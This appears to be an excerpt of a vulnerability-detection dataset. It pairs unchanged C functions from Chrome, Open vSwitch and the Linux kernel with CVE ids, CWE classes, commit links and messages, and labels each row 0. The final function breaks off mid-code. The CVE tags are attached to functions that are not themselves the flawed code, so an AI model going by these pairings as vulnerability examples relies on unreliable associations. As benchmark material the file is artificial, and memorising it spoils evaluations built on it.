Reland "AppCache: Add padding to cross-origin responses." This is a reland of 85b389caa7d725cdd31f59e9a2b79ff54804b7b7 Initialized CacheRecord::padding_size to 0. Original change's description: > AppCache: Add padding to cross-origin responses. > > Bug: 918293 > Change-Id: I4f16640f06feac009d6bbbb624951da6d2669f6c > Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1488059 > Commit-Queue: Staphany Park <[email protected]> > Reviewed-by: Victor Costan <[email protected]> > Reviewed-by: Marijn Kruisselbrink <[email protected]> > Cr-Commit-Position: refs/heads/master@{#644624} Bug: 918293 Change-Id: Ie1d3f99c7e8a854d33255a4d66243da2ce16441c Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1539906 Reviewed-by: Victor Costan <[email protected]> Commit-Queue: Staphany Park <[email protected]> Cr-Commit-Position: refs/heads/master@{#644719}
bool AppCacheDatabase::InsertOnlineWhiteList( const OnlineWhiteListRecord* record) { if (!LazyOpen(kCreateIfNeeded)) return false; static const char kSql[] = "INSERT INTO OnlineWhiteLists (cache_id, namespace_url, is_pattern)" " VALUES (?, ?, ?)"; sql::Statement statement(db_->GetCachedStatement(SQL_FROM_HERE, kSql)); statement.BindInt64(0, record->cache_id); statement.BindString(1, record->namespace_url.spec()); statement.BindBool(2, record->is_pattern); return statement.Run(); }
bool AppCacheDatabase::InsertOnlineWhiteList( const OnlineWhiteListRecord* record) { if (!LazyOpen(kCreateIfNeeded)) return false; static const char kSql[] = "INSERT INTO OnlineWhiteLists (cache_id, namespace_url, is_pattern)" " VALUES (?, ?, ?)"; sql::Statement statement(db_->GetCachedStatement(SQL_FROM_HERE, kSql)); statement.BindInt64(0, record->cache_id); statement.BindString(1, record->namespace_url.spec()); statement.BindBool(2, record->is_pattern); return statement.Run(); }
C
Chrome
0
CVE-2018-6063
https://www.cvedetails.com/cve/CVE-2018-6063/
CWE-787
https://github.com/chromium/chromium/commit/673ce95d481ea9368c4d4d43ac756ba1d6d9e608
673ce95d481ea9368c4d4d43ac756ba1d6d9e608
Correct mojo::WrapSharedMemoryHandle usage Fixes some incorrect uses of mojo::WrapSharedMemoryHandle which were assuming that the call actually has any control over the memory protection applied to a handle when mapped. Where fixing usage is infeasible for this CL, TODOs are added to annotate follow-up work. Also updates the API and documentation to (hopefully) improve clarity and avoid similar mistakes from being made in the future. BUG=792900 Cq-Include-Trybots: master.tryserver.chromium.android:android_optional_gpu_tests_rel;master.tryserver.chromium.linux:linux_optional_gpu_tests_rel;master.tryserver.chromium.mac:mac_optional_gpu_tests_rel;master.tryserver.chromium.win:win_optional_gpu_tests_rel Change-Id: I0578aaa9ca3bfcb01aaf2451315d1ede95458477 Reviewed-on: https://chromium-review.googlesource.com/818282 Reviewed-by: Wei Li <[email protected]> Reviewed-by: Lei Zhang <[email protected]> Reviewed-by: John Abd-El-Malek <[email protected]> Reviewed-by: Daniel Cheng <[email protected]> Reviewed-by: Sadrul Chowdhury <[email protected]> Reviewed-by: Yuzhu Shen <[email protected]> Reviewed-by: Robert Sesek <[email protected]> Commit-Queue: Ken Rockot <[email protected]> Cr-Commit-Position: refs/heads/master@{#530268}
ScopedHandle WrapMachPort(mach_port_t port) { kern_return_t kr = mach_port_mod_refs(mach_task_self(), port, MACH_PORT_RIGHT_SEND, 1); MACH_LOG_IF(ERROR, kr != KERN_SUCCESS, kr) << "MachPortAttachmentMac mach_port_mod_refs"; if (kr != KERN_SUCCESS) return ScopedHandle(); MojoPlatformHandle platform_handle; platform_handle.struct_size = sizeof(MojoPlatformHandle); platform_handle.type = MOJO_PLATFORM_HANDLE_TYPE_MACH_PORT; platform_handle.value = static_cast<uint64_t>(port); MojoHandle mojo_handle; MojoResult result = MojoWrapPlatformHandle(&platform_handle, &mojo_handle); CHECK_EQ(result, MOJO_RESULT_OK); return ScopedHandle(Handle(mojo_handle)); }
ScopedHandle WrapMachPort(mach_port_t port) { kern_return_t kr = mach_port_mod_refs(mach_task_self(), port, MACH_PORT_RIGHT_SEND, 1); MACH_LOG_IF(ERROR, kr != KERN_SUCCESS, kr) << "MachPortAttachmentMac mach_port_mod_refs"; if (kr != KERN_SUCCESS) return ScopedHandle(); MojoPlatformHandle platform_handle; platform_handle.struct_size = sizeof(MojoPlatformHandle); platform_handle.type = MOJO_PLATFORM_HANDLE_TYPE_MACH_PORT; platform_handle.value = static_cast<uint64_t>(port); MojoHandle mojo_handle; MojoResult result = MojoWrapPlatformHandle(&platform_handle, &mojo_handle); CHECK_EQ(result, MOJO_RESULT_OK); return ScopedHandle(Handle(mojo_handle)); }
C
Chrome
0
CVE-2018-20068
https://www.cvedetails.com/cve/CVE-2018-20068/
CWE-20
https://github.com/chromium/chromium/commit/4f8104c528f0147c7527718d5aa7c9c38c8220d0
4f8104c528f0147c7527718d5aa7c9c38c8220d0
Abort navigations on 304 responses. A recent change (https://chromium-review.googlesource.com/1161479) accidentally resulted in treating 304 responses as downloads. This CL treats them as ERR_ABORTED instead. This doesn't exactly match old behavior, which passed them on to the renderer, which then aborted them. The new code results in correctly restoring the original URL in the omnibox, and has a shiny new test to prevent future regressions. Bug: 882270 Change-Id: Ic73dcce9e9596d43327b13acde03b4ed9bd0c82e Reviewed-on: https://chromium-review.googlesource.com/1252684 Commit-Queue: Matt Menke <[email protected]> Reviewed-by: Camille Lamy <[email protected]> Cr-Commit-Position: refs/heads/master@{#595641}
void Start( std::unique_ptr<network::SharedURLLoaderFactoryInfo> network_loader_factory_info, ServiceWorkerNavigationHandleCore* service_worker_navigation_handle_core, AppCacheNavigationHandleCore* appcache_handle_core, std::unique_ptr<NavigationRequestInfo> request_info, std::unique_ptr<NavigationUIData> navigation_ui_data, network::mojom::URLLoaderFactoryPtrInfo factory_for_webui, int frame_tree_node_id, std::unique_ptr<service_manager::Connector> connector) { DCHECK_CURRENTLY_ON(BrowserThread::IO); DCHECK(base::FeatureList::IsEnabled(network::features::kNetworkService)); DCHECK(!started_); global_request_id_ = MakeGlobalRequestID(); frame_tree_node_id_ = frame_tree_node_id; started_ = true; web_contents_getter_ = base::Bind(&GetWebContentsFromFrameTreeNodeID, frame_tree_node_id); navigation_ui_data_ = std::move(navigation_ui_data); DCHECK(network_loader_factory_info); network_loader_factory_ = network::SharedURLLoaderFactory::Create( std::move(network_loader_factory_info)); if (resource_request_->request_body) { GetBodyBlobDataHandles(resource_request_->request_body.get(), resource_context_, &blob_handles_); } if (factory_for_webui.is_valid()) { url_loader_ = ThrottlingURLLoader::CreateLoaderAndStart( base::MakeRefCounted<network::WrapperSharedURLLoaderFactory>( std::move(factory_for_webui)), CreateURLLoaderThrottles(), 0 /* routing_id */, global_request_id_.request_id, network::mojom::kURLLoadOptionNone, resource_request_.get(), this, kNavigationUrlLoaderTrafficAnnotation, base::ThreadTaskRunnerHandle::Get()); return; } if (request_info->common_params.url.SchemeIsBlob() && request_info->blob_url_loader_factory) { url_loader_ = ThrottlingURLLoader::CreateLoaderAndStart( network::SharedURLLoaderFactory::Create( std::move(request_info->blob_url_loader_factory)), CreateURLLoaderThrottles(), 0 /* routing_id */, global_request_id_.request_id, network::mojom::kURLLoadOptionNone, resource_request_.get(), this, kNavigationUrlLoaderTrafficAnnotation, base::ThreadTaskRunnerHandle::Get()); return; } if (service_worker_navigation_handle_core) { std::unique_ptr<NavigationLoaderInterceptor> service_worker_interceptor = CreateServiceWorkerInterceptor(*request_info, service_worker_navigation_handle_core); if (service_worker_interceptor) interceptors_.push_back(std::move(service_worker_interceptor)); } if (appcache_handle_core) { std::unique_ptr<NavigationLoaderInterceptor> appcache_interceptor = AppCacheRequestHandler::InitializeForMainResourceNetworkService( *resource_request_, appcache_handle_core->host()->GetWeakPtr(), network_loader_factory_); if (appcache_interceptor) interceptors_.push_back(std::move(appcache_interceptor)); } if (signed_exchange_utils::IsSignedExchangeHandlingEnabled()) { interceptors_.push_back(std::make_unique<SignedExchangeRequestHandler>( url::Origin::Create(request_info->common_params.url), request_info->common_params.url, GetURLLoaderOptions(request_info->is_main_frame), request_info->frame_tree_node_id, request_info->devtools_navigation_token, request_info->devtools_frame_token, request_info->report_raw_headers, request_info->begin_params->load_flags, network_loader_factory_, base::BindRepeating( &URLLoaderRequestController::CreateURLLoaderThrottles, base::Unretained(this)))); } std::vector<std::unique_ptr<URLLoaderRequestInterceptor>> browser_interceptors = GetContentClient() ->browser() ->WillCreateURLLoaderRequestInterceptors( navigation_ui_data_.get(), request_info->frame_tree_node_id); if (!browser_interceptors.empty()) { for (auto& browser_interceptor : browser_interceptors) { interceptors_.push_back( std::make_unique<NavigationLoaderInterceptorBrowserContainer>( std::move(browser_interceptor))); } } Restart(); }
void Start( std::unique_ptr<network::SharedURLLoaderFactoryInfo> network_loader_factory_info, ServiceWorkerNavigationHandleCore* service_worker_navigation_handle_core, AppCacheNavigationHandleCore* appcache_handle_core, std::unique_ptr<NavigationRequestInfo> request_info, std::unique_ptr<NavigationUIData> navigation_ui_data, network::mojom::URLLoaderFactoryPtrInfo factory_for_webui, int frame_tree_node_id, std::unique_ptr<service_manager::Connector> connector) { DCHECK_CURRENTLY_ON(BrowserThread::IO); DCHECK(base::FeatureList::IsEnabled(network::features::kNetworkService)); DCHECK(!started_); global_request_id_ = MakeGlobalRequestID(); frame_tree_node_id_ = frame_tree_node_id; started_ = true; web_contents_getter_ = base::Bind(&GetWebContentsFromFrameTreeNodeID, frame_tree_node_id); navigation_ui_data_ = std::move(navigation_ui_data); DCHECK(network_loader_factory_info); network_loader_factory_ = network::SharedURLLoaderFactory::Create( std::move(network_loader_factory_info)); if (resource_request_->request_body) { GetBodyBlobDataHandles(resource_request_->request_body.get(), resource_context_, &blob_handles_); } if (factory_for_webui.is_valid()) { url_loader_ = ThrottlingURLLoader::CreateLoaderAndStart( base::MakeRefCounted<network::WrapperSharedURLLoaderFactory>( std::move(factory_for_webui)), CreateURLLoaderThrottles(), 0 /* routing_id */, global_request_id_.request_id, network::mojom::kURLLoadOptionNone, resource_request_.get(), this, kNavigationUrlLoaderTrafficAnnotation, base::ThreadTaskRunnerHandle::Get()); return; } if (request_info->common_params.url.SchemeIsBlob() && request_info->blob_url_loader_factory) { url_loader_ = ThrottlingURLLoader::CreateLoaderAndStart( network::SharedURLLoaderFactory::Create( std::move(request_info->blob_url_loader_factory)), CreateURLLoaderThrottles(), 0 /* routing_id */, global_request_id_.request_id, network::mojom::kURLLoadOptionNone, resource_request_.get(), this, kNavigationUrlLoaderTrafficAnnotation, base::ThreadTaskRunnerHandle::Get()); return; } if (service_worker_navigation_handle_core) { std::unique_ptr<NavigationLoaderInterceptor> service_worker_interceptor = CreateServiceWorkerInterceptor(*request_info, service_worker_navigation_handle_core); if (service_worker_interceptor) interceptors_.push_back(std::move(service_worker_interceptor)); } if (appcache_handle_core) { std::unique_ptr<NavigationLoaderInterceptor> appcache_interceptor = AppCacheRequestHandler::InitializeForMainResourceNetworkService( *resource_request_, appcache_handle_core->host()->GetWeakPtr(), network_loader_factory_); if (appcache_interceptor) interceptors_.push_back(std::move(appcache_interceptor)); } if (signed_exchange_utils::IsSignedExchangeHandlingEnabled()) { interceptors_.push_back(std::make_unique<SignedExchangeRequestHandler>( url::Origin::Create(request_info->common_params.url), request_info->common_params.url, GetURLLoaderOptions(request_info->is_main_frame), request_info->frame_tree_node_id, request_info->devtools_navigation_token, request_info->devtools_frame_token, request_info->report_raw_headers, request_info->begin_params->load_flags, network_loader_factory_, base::BindRepeating( &URLLoaderRequestController::CreateURLLoaderThrottles, base::Unretained(this)))); } std::vector<std::unique_ptr<URLLoaderRequestInterceptor>> browser_interceptors = GetContentClient() ->browser() ->WillCreateURLLoaderRequestInterceptors( navigation_ui_data_.get(), request_info->frame_tree_node_id); if (!browser_interceptors.empty()) { for (auto& browser_interceptor : browser_interceptors) { interceptors_.push_back( std::make_unique<NavigationLoaderInterceptorBrowserContainer>( std::move(browser_interceptor))); } } Restart(); }
C
Chrome
0
CVE-2011-2350
https://www.cvedetails.com/cve/CVE-2011-2350/
CWE-20
https://github.com/chromium/chromium/commit/b944f670bb7a8a919daac497a4ea0536c954c201
b944f670bb7a8a919daac497a4ea0536c954c201
[JSC] Implement a helper method createNotEnoughArgumentsError() https://bugs.webkit.org/show_bug.cgi?id=85102 Reviewed by Geoffrey Garen. In bug 84787, kbr@ requested to avoid hard-coding createTypeError(exec, "Not enough arguments") here and there. This patch implements createNotEnoughArgumentsError(exec) and uses it in JSC bindings. c.f. a corresponding bug for V8 bindings is bug 85097. Source/JavaScriptCore: * runtime/Error.cpp: (JSC::createNotEnoughArgumentsError): (JSC): * runtime/Error.h: (JSC): Source/WebCore: Test: bindings/scripts/test/TestObj.idl * bindings/scripts/CodeGeneratorJS.pm: Modified as described above. (GenerateArgumentsCountCheck): * bindings/js/JSDataViewCustom.cpp: Ditto. (WebCore::getDataViewMember): (WebCore::setDataViewMember): * bindings/js/JSDeprecatedPeerConnectionCustom.cpp: (WebCore::JSDeprecatedPeerConnectionConstructor::constructJSDeprecatedPeerConnection): * bindings/js/JSDirectoryEntryCustom.cpp: (WebCore::JSDirectoryEntry::getFile): (WebCore::JSDirectoryEntry::getDirectory): * bindings/js/JSSharedWorkerCustom.cpp: (WebCore::JSSharedWorkerConstructor::constructJSSharedWorker): * bindings/js/JSWebKitMutationObserverCustom.cpp: (WebCore::JSWebKitMutationObserverConstructor::constructJSWebKitMutationObserver): (WebCore::JSWebKitMutationObserver::observe): * bindings/js/JSWorkerCustom.cpp: (WebCore::JSWorkerConstructor::constructJSWorker): * bindings/scripts/test/JS/JSFloat64Array.cpp: Updated run-bindings-tests. (WebCore::jsFloat64ArrayPrototypeFunctionFoo): * bindings/scripts/test/JS/JSTestActiveDOMObject.cpp: (WebCore::jsTestActiveDOMObjectPrototypeFunctionExcitingFunction): (WebCore::jsTestActiveDOMObjectPrototypeFunctionPostMessage): * bindings/scripts/test/JS/JSTestCustomNamedGetter.cpp: (WebCore::jsTestCustomNamedGetterPrototypeFunctionAnotherFunction): * bindings/scripts/test/JS/JSTestEventTarget.cpp: (WebCore::jsTestEventTargetPrototypeFunctionItem): (WebCore::jsTestEventTargetPrototypeFunctionAddEventListener): (WebCore::jsTestEventTargetPrototypeFunctionRemoveEventListener): (WebCore::jsTestEventTargetPrototypeFunctionDispatchEvent): * bindings/scripts/test/JS/JSTestInterface.cpp: (WebCore::JSTestInterfaceConstructor::constructJSTestInterface): (WebCore::jsTestInterfacePrototypeFunctionSupplementalMethod2): * bindings/scripts/test/JS/JSTestMediaQueryListListener.cpp: (WebCore::jsTestMediaQueryListListenerPrototypeFunctionMethod): * bindings/scripts/test/JS/JSTestNamedConstructor.cpp: (WebCore::JSTestNamedConstructorNamedConstructor::constructJSTestNamedConstructor): * bindings/scripts/test/JS/JSTestObj.cpp: (WebCore::JSTestObjConstructor::constructJSTestObj): (WebCore::jsTestObjPrototypeFunctionVoidMethodWithArgs): (WebCore::jsTestObjPrototypeFunctionIntMethodWithArgs): (WebCore::jsTestObjPrototypeFunctionObjMethodWithArgs): (WebCore::jsTestObjPrototypeFunctionMethodWithSequenceArg): (WebCore::jsTestObjPrototypeFunctionMethodReturningSequence): (WebCore::jsTestObjPrototypeFunctionMethodThatRequiresAllArgsAndThrows): (WebCore::jsTestObjPrototypeFunctionSerializedValue): (WebCore::jsTestObjPrototypeFunctionIdbKey): (WebCore::jsTestObjPrototypeFunctionOptionsObject): (WebCore::jsTestObjPrototypeFunctionAddEventListener): (WebCore::jsTestObjPrototypeFunctionRemoveEventListener): (WebCore::jsTestObjPrototypeFunctionMethodWithNonOptionalArgAndOptionalArg): (WebCore::jsTestObjPrototypeFunctionMethodWithNonOptionalArgAndTwoOptionalArgs): (WebCore::jsTestObjPrototypeFunctionMethodWithCallbackArg): (WebCore::jsTestObjPrototypeFunctionMethodWithNonCallbackArgAndCallbackArg): (WebCore::jsTestObjPrototypeFunctionOverloadedMethod1): (WebCore::jsTestObjPrototypeFunctionOverloadedMethod2): (WebCore::jsTestObjPrototypeFunctionOverloadedMethod3): (WebCore::jsTestObjPrototypeFunctionOverloadedMethod4): (WebCore::jsTestObjPrototypeFunctionOverloadedMethod5): (WebCore::jsTestObjPrototypeFunctionOverloadedMethod6): (WebCore::jsTestObjPrototypeFunctionOverloadedMethod7): (WebCore::jsTestObjConstructorFunctionClassMethod2): (WebCore::jsTestObjConstructorFunctionOverloadedMethod11): (WebCore::jsTestObjConstructorFunctionOverloadedMethod12): (WebCore::jsTestObjPrototypeFunctionMethodWithUnsignedLongArray): (WebCore::jsTestObjPrototypeFunctionConvert1): (WebCore::jsTestObjPrototypeFunctionConvert2): (WebCore::jsTestObjPrototypeFunctionConvert3): (WebCore::jsTestObjPrototypeFunctionConvert4): (WebCore::jsTestObjPrototypeFunctionConvert5): (WebCore::jsTestObjPrototypeFunctionStrictFunction): * bindings/scripts/test/JS/JSTestSerializedScriptValueInterface.cpp: (WebCore::JSTestSerializedScriptValueInterfaceConstructor::constructJSTestSerializedScriptValueInterface): (WebCore::jsTestSerializedScriptValueInterfacePrototypeFunctionAcceptTransferList): git-svn-id: svn://svn.chromium.org/blink/trunk@115536 bbb929c8-8fbe-4397-9dbb-9b2b20218538
void setJSTestObjWithScriptExecutionContextAttribute(ExecState* exec, JSObject* thisObject, JSValue value) { JSTestObj* castedThis = jsCast<JSTestObj*>(thisObject); TestObj* impl = static_cast<TestObj*>(castedThis->impl()); ScriptExecutionContext* scriptContext = jsCast<JSDOMGlobalObject*>(exec->lexicalGlobalObject())->scriptExecutionContext(); if (!scriptContext) return; impl->setWithScriptExecutionContextAttribute(scriptContext, toTestObj(value)); }
void setJSTestObjWithScriptExecutionContextAttribute(ExecState* exec, JSObject* thisObject, JSValue value) { JSTestObj* castedThis = jsCast<JSTestObj*>(thisObject); TestObj* impl = static_cast<TestObj*>(castedThis->impl()); ScriptExecutionContext* scriptContext = jsCast<JSDOMGlobalObject*>(exec->lexicalGlobalObject())->scriptExecutionContext(); if (!scriptContext) return; impl->setWithScriptExecutionContextAttribute(scriptContext, toTestObj(value)); }
C
Chrome
0
CVE-2018-17206
https://www.cvedetails.com/cve/CVE-2018-17206/
null
https://github.com/openvswitch/ovs/commit/9237a63c47bd314b807cda0bd2216264e82edbe8
9237a63c47bd314b807cda0bd2216264e82edbe8
ofp-actions: Avoid buffer overread in BUNDLE action decoding. Reported-at: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=9052 Signed-off-by: Ben Pfaff <[email protected]> Acked-by: Justin Pettit <[email protected]>
encode_CONJUNCTION(const struct ofpact_conjunction *oc, enum ofp_version ofp_version OVS_UNUSED, struct ofpbuf *out) { struct nx_action_conjunction *nac = put_NXAST_CONJUNCTION(out); nac->clause = oc->clause; nac->n_clauses = oc->n_clauses; nac->id = htonl(oc->id); }
encode_CONJUNCTION(const struct ofpact_conjunction *oc, enum ofp_version ofp_version OVS_UNUSED, struct ofpbuf *out) { struct nx_action_conjunction *nac = put_NXAST_CONJUNCTION(out); nac->clause = oc->clause; nac->n_clauses = oc->n_clauses; nac->id = htonl(oc->id); }
C
ovs
0
null
null
null
https://github.com/chromium/chromium/commit/f2f703241635fa96fa630b83afcc9a330cc21b7e
f2f703241635fa96fa630b83afcc9a330cc21b7e
CrOS Shelf: Get rid of 'split view' mode for shelf background In the new UI, "maximized" and "split view" are treated the same in specs, so there is no more need for a separate "split view" mode. This folds it into the "maximized" mode. Note that the only thing that _seems_ different in shelf_background_animator is ShelfBackgroundAnimator::kMaxAlpha (255) vs kShelfTranslucentMaximizedWindow (254), which should be virtually impossible to distinguish. This CL therefore does not have any visual effect (and doesn't directly fix the linked bug, but is relevant). Bug: 899289 Change-Id: I60947338176ac15ca016b1ba4edf13d16362cb24 Reviewed-on: https://chromium-review.googlesource.com/c/1469741 Commit-Queue: Xiyuan Xia <[email protected]> Reviewed-by: Xiyuan Xia <[email protected]> Auto-Submit: Manu Cornet <[email protected]> Cr-Commit-Position: refs/heads/master@{#631752}
const ui::Layer* GetNonLockScreenContainersContainerLayer() const { const auto* shelf_window = GetShelfWidget()->GetNativeWindow(); return shelf_window->GetRootWindow() ->GetChildById(kShellWindowId_NonLockScreenContainersContainer) ->layer(); }
const ui::Layer* GetNonLockScreenContainersContainerLayer() const { const auto* shelf_window = GetShelfWidget()->GetNativeWindow(); return shelf_window->GetRootWindow() ->GetChildById(kShellWindowId_NonLockScreenContainersContainer) ->layer(); }
C
Chrome
0
CVE-2013-7027
https://www.cvedetails.com/cve/CVE-2013-7027/
CWE-119
https://github.com/torvalds/linux/commit/f5563318ff1bde15b10e736e97ffce13be08bc1a
f5563318ff1bde15b10e736e97ffce13be08bc1a
wireless: radiotap: fix parsing buffer overrun When parsing an invalid radiotap header, the parser can overrun the buffer that is passed in because it doesn't correctly check 1) the minimum radiotap header size 2) the space for extended bitmaps The first issue doesn't affect any in-kernel user as they all check the minimum size before calling the radiotap function. The second issue could potentially affect the kernel if an skb is passed in that consists only of the radiotap header with a lot of extended bitmaps that extend past the SKB. In that case a read-only buffer overrun by at most 4 bytes is possible. Fix this by adding the appropriate checks to the parser. Cc: [email protected] Reported-by: Evan Huus <[email protected]> Signed-off-by: Johannes Berg <[email protected]>
int ieee80211_radiotap_iterator_next( struct ieee80211_radiotap_iterator *iterator) { while (1) { int hit = 0; int pad, align, size, subns; uint32_t oui; /* if no more EXT bits, that's it */ if ((iterator->_arg_index % 32) == IEEE80211_RADIOTAP_EXT && !(iterator->_bitmap_shifter & 1)) return -ENOENT; if (!(iterator->_bitmap_shifter & 1)) goto next_entry; /* arg not present */ /* get alignment/size of data */ switch (iterator->_arg_index % 32) { case IEEE80211_RADIOTAP_RADIOTAP_NAMESPACE: case IEEE80211_RADIOTAP_EXT: align = 1; size = 0; break; case IEEE80211_RADIOTAP_VENDOR_NAMESPACE: align = 2; size = 6; break; default: if (!iterator->current_namespace || iterator->_arg_index >= iterator->current_namespace->n_bits) { if (iterator->current_namespace == &radiotap_ns) return -ENOENT; align = 0; } else { align = iterator->current_namespace->align_size[iterator->_arg_index].align; size = iterator->current_namespace->align_size[iterator->_arg_index].size; } if (!align) { /* skip all subsequent data */ iterator->_arg = iterator->_next_ns_data; /* give up on this namespace */ iterator->current_namespace = NULL; goto next_entry; } break; } /* * arg is present, account for alignment padding * * Note that these alignments are relative to the start * of the radiotap header. There is no guarantee * that the radiotap header itself is aligned on any * kind of boundary. * * The above is why get_unaligned() is used to dereference * multibyte elements from the radiotap area. */ pad = ((unsigned long)iterator->_arg - (unsigned long)iterator->_rtheader) & (align - 1); if (pad) iterator->_arg += align - pad; if (iterator->_arg_index % 32 == IEEE80211_RADIOTAP_VENDOR_NAMESPACE) { int vnslen; if ((unsigned long)iterator->_arg + size - (unsigned long)iterator->_rtheader > (unsigned long)iterator->_max_length) return -EINVAL; oui = (*iterator->_arg << 16) | (*(iterator->_arg + 1) << 8) | *(iterator->_arg + 2); subns = *(iterator->_arg + 3); find_ns(iterator, oui, subns); vnslen = get_unaligned_le16(iterator->_arg + 4); iterator->_next_ns_data = iterator->_arg + size + vnslen; if (!iterator->current_namespace) size += vnslen; } /* * this is what we will return to user, but we need to * move on first so next call has something fresh to test */ iterator->this_arg_index = iterator->_arg_index; iterator->this_arg = iterator->_arg; iterator->this_arg_size = size; /* internally move on the size of this arg */ iterator->_arg += size; /* * check for insanity where we are given a bitmap that * claims to have more arg content than the length of the * radiotap section. We will normally end up equalling this * max_length on the last arg, never exceeding it. */ if ((unsigned long)iterator->_arg - (unsigned long)iterator->_rtheader > (unsigned long)iterator->_max_length) return -EINVAL; /* these special ones are valid in each bitmap word */ switch (iterator->_arg_index % 32) { case IEEE80211_RADIOTAP_VENDOR_NAMESPACE: iterator->_reset_on_ext = 1; iterator->is_radiotap_ns = 0; /* * If parser didn't register this vendor * namespace with us, allow it to show it * as 'raw. Do do that, set argument index * to vendor namespace. */ iterator->this_arg_index = IEEE80211_RADIOTAP_VENDOR_NAMESPACE; if (!iterator->current_namespace) hit = 1; goto next_entry; case IEEE80211_RADIOTAP_RADIOTAP_NAMESPACE: iterator->_reset_on_ext = 1; iterator->current_namespace = &radiotap_ns; iterator->is_radiotap_ns = 1; goto next_entry; case IEEE80211_RADIOTAP_EXT: /* * bit 31 was set, there is more * -- move to next u32 bitmap */ iterator->_bitmap_shifter = get_unaligned_le32(iterator->_next_bitmap); iterator->_next_bitmap++; if (iterator->_reset_on_ext) iterator->_arg_index = 0; else iterator->_arg_index++; iterator->_reset_on_ext = 0; break; default: /* we've got a hit! */ hit = 1; next_entry: iterator->_bitmap_shifter >>= 1; iterator->_arg_index++; } /* if we found a valid arg earlier, return it now */ if (hit) return 0; } }
int ieee80211_radiotap_iterator_next( struct ieee80211_radiotap_iterator *iterator) { while (1) { int hit = 0; int pad, align, size, subns; uint32_t oui; /* if no more EXT bits, that's it */ if ((iterator->_arg_index % 32) == IEEE80211_RADIOTAP_EXT && !(iterator->_bitmap_shifter & 1)) return -ENOENT; if (!(iterator->_bitmap_shifter & 1)) goto next_entry; /* arg not present */ /* get alignment/size of data */ switch (iterator->_arg_index % 32) { case IEEE80211_RADIOTAP_RADIOTAP_NAMESPACE: case IEEE80211_RADIOTAP_EXT: align = 1; size = 0; break; case IEEE80211_RADIOTAP_VENDOR_NAMESPACE: align = 2; size = 6; break; default: if (!iterator->current_namespace || iterator->_arg_index >= iterator->current_namespace->n_bits) { if (iterator->current_namespace == &radiotap_ns) return -ENOENT; align = 0; } else { align = iterator->current_namespace->align_size[iterator->_arg_index].align; size = iterator->current_namespace->align_size[iterator->_arg_index].size; } if (!align) { /* skip all subsequent data */ iterator->_arg = iterator->_next_ns_data; /* give up on this namespace */ iterator->current_namespace = NULL; goto next_entry; } break; } /* * arg is present, account for alignment padding * * Note that these alignments are relative to the start * of the radiotap header. There is no guarantee * that the radiotap header itself is aligned on any * kind of boundary. * * The above is why get_unaligned() is used to dereference * multibyte elements from the radiotap area. */ pad = ((unsigned long)iterator->_arg - (unsigned long)iterator->_rtheader) & (align - 1); if (pad) iterator->_arg += align - pad; if (iterator->_arg_index % 32 == IEEE80211_RADIOTAP_VENDOR_NAMESPACE) { int vnslen; if ((unsigned long)iterator->_arg + size - (unsigned long)iterator->_rtheader > (unsigned long)iterator->_max_length) return -EINVAL; oui = (*iterator->_arg << 16) | (*(iterator->_arg + 1) << 8) | *(iterator->_arg + 2); subns = *(iterator->_arg + 3); find_ns(iterator, oui, subns); vnslen = get_unaligned_le16(iterator->_arg + 4); iterator->_next_ns_data = iterator->_arg + size + vnslen; if (!iterator->current_namespace) size += vnslen; } /* * this is what we will return to user, but we need to * move on first so next call has something fresh to test */ iterator->this_arg_index = iterator->_arg_index; iterator->this_arg = iterator->_arg; iterator->this_arg_size = size; /* internally move on the size of this arg */ iterator->_arg += size; /* * check for insanity where we are given a bitmap that * claims to have more arg content than the length of the * radiotap section. We will normally end up equalling this * max_length on the last arg, never exceeding it. */ if ((unsigned long)iterator->_arg - (unsigned long)iterator->_rtheader > (unsigned long)iterator->_max_length) return -EINVAL; /* these special ones are valid in each bitmap word */ switch (iterator->_arg_index % 32) { case IEEE80211_RADIOTAP_VENDOR_NAMESPACE: iterator->_reset_on_ext = 1; iterator->is_radiotap_ns = 0; /* * If parser didn't register this vendor * namespace with us, allow it to show it * as 'raw. Do do that, set argument index * to vendor namespace. */ iterator->this_arg_index = IEEE80211_RADIOTAP_VENDOR_NAMESPACE; if (!iterator->current_namespace) hit = 1; goto next_entry; case IEEE80211_RADIOTAP_RADIOTAP_NAMESPACE: iterator->_reset_on_ext = 1; iterator->current_namespace = &radiotap_ns; iterator->is_radiotap_ns = 1; goto next_entry; case IEEE80211_RADIOTAP_EXT: /* * bit 31 was set, there is more * -- move to next u32 bitmap */ iterator->_bitmap_shifter = get_unaligned_le32(iterator->_next_bitmap); iterator->_next_bitmap++; if (iterator->_reset_on_ext) iterator->_arg_index = 0; else iterator->_arg_index++; iterator->_reset_on_ext = 0; break; default: /* we've got a hit! */ hit = 1; next_entry: iterator->_bitmap_shifter >>= 1; iterator->_arg_index++; } /* if we found a valid arg earlier, return it now */ if (hit) return 0; } }
C
linux
0
CVE-2016-10150
https://www.cvedetails.com/cve/CVE-2016-10150/
CWE-416
https://github.com/torvalds/linux/commit/a0f1d21c1ccb1da66629627a74059dd7f5ac9c61
a0f1d21c1ccb1da66629627a74059dd7f5ac9c61
KVM: use after free in kvm_ioctl_create_device() We should move the ops->destroy(dev) after the list_del(&dev->vm_node) so that we don't use "dev" after freeing it. Fixes: a28ebea2adc4 ("KVM: Protect device ops->create and list_add with kvm->lock") Signed-off-by: Dan Carpenter <[email protected]> Reviewed-by: David Hildenbrand <[email protected]> Signed-off-by: Radim Krčmář <[email protected]>
void kvm_vcpu_on_spin(struct kvm_vcpu *me) { struct kvm *kvm = me->kvm; struct kvm_vcpu *vcpu; int last_boosted_vcpu = me->kvm->last_boosted_vcpu; int yielded = 0; int try = 3; int pass; int i; kvm_vcpu_set_in_spin_loop(me, true); /* * We boost the priority of a VCPU that is runnable but not * currently running, because it got preempted by something * else and called schedule in __vcpu_run. Hopefully that * VCPU is holding the lock that we need and will release it. * We approximate round-robin by starting at the last boosted VCPU. */ for (pass = 0; pass < 2 && !yielded && try; pass++) { kvm_for_each_vcpu(i, vcpu, kvm) { if (!pass && i <= last_boosted_vcpu) { i = last_boosted_vcpu; continue; } else if (pass && i > last_boosted_vcpu) break; if (!ACCESS_ONCE(vcpu->preempted)) continue; if (vcpu == me) continue; if (swait_active(&vcpu->wq) && !kvm_arch_vcpu_runnable(vcpu)) continue; if (!kvm_vcpu_eligible_for_directed_yield(vcpu)) continue; yielded = kvm_vcpu_yield_to(vcpu); if (yielded > 0) { kvm->last_boosted_vcpu = i; break; } else if 